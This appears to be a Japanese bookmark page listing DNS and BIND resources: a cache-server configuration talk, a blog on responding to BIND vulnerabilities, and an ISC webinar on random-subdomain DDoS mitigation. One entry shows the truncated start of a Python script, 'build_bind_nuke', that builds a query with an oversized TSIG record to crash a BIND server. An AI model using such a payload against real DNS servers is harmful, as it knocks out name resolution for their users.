キャッシュサーバの設定 IIJ 山口崇徳 DNS Summer Days 2014 自己紹介 • IIJというところでDNSの運用やってます – お客様用参照サーバ – お客様のゾーンを預かる権威サーバ – 某ccTLDのセカンダリ • 最初のDNSのお仕事は BIND4 → BIND8 の移行 – 前世紀末 • その他、メールやったり web いじったり – L7 のなんでも屋さん はじめに • BIND、Unbound が対象 – ほかはさわったことないので… – 設定のコピペはできなくても、考え方自体は他でも通用するは ず • 設定ファイルの文法レベルの話、BIND で権威サー バと共通する設定は触れません – 時間が足りないっす… – マニュアル読んでください • DNSSEC は触れません 基本設定 RTFM • BIND 9 Administrator Reference Ma
import socket import struct TARGET = ('192.168.200.10', 53) Q_A = 1 Q_TSIG = 250 DNS_MESSAGE_HEADERLEN = 12 def build_bind_nuke(question="\x06google\x03com\x00", udpsize=512): query_A = "\x8f\x65\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01" + question + int16(Q_A) + "\x00\x01" sweet_spot = udpsize - DNS_MESSAGE_HEADERLEN + 1 tsig_rr = build_tsig_rr(sweet_spot) return query_A + tsig_rr def int16(n): re
おはこんばんにちは。ナツヨです。 いつか、脆弱性対応についての記事を書こうと思っていたら、BINDさんがまた 脆弱性を発表してくれました。(CVE-2015-8704,CVE-2015-8705) 前回の発表から1ヶ月も立っていないのに、流石BINDさんだなぁと思いました。(遠い目) 今日は、BINDに焦点をあてて、脆弱性対応とはどういうことが必要なのかまとめていこうと思います。すでに日常的に脆弱性対応されている方というよりは、「なんかしらんけどDNSサーバの管理者になっていた。とりあえずBINDというソフトウェアで動いていることは知っている」という方向けだと思います。 1.BINDの脆弱性の発表をキャッチする BINDの脆弱性について、世の中で一番早く発信するのはBINDのサポートを行っているISC本家(BIND | Internet Systems Consortium)だと思います。
Internet Systems Consortium > Events > Webinar > ISC Webinar: Random sub-domain resolver DDOS mitigation The past year has seen a resurgence in a brute force DDOS against DNS systems, featuring volumes of queries for pseudo-random, but non-existent, domains. This talk, by Cathy Almond, Senior Support Engineer, and Eddy Winstead, Senior Sales Engineer, explains how ‘fetches per zone’ and ‘fetches p
リリース、障害情報などのサービスのお知らせ
最新の人気エントリーの配信
処理を実行中です
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く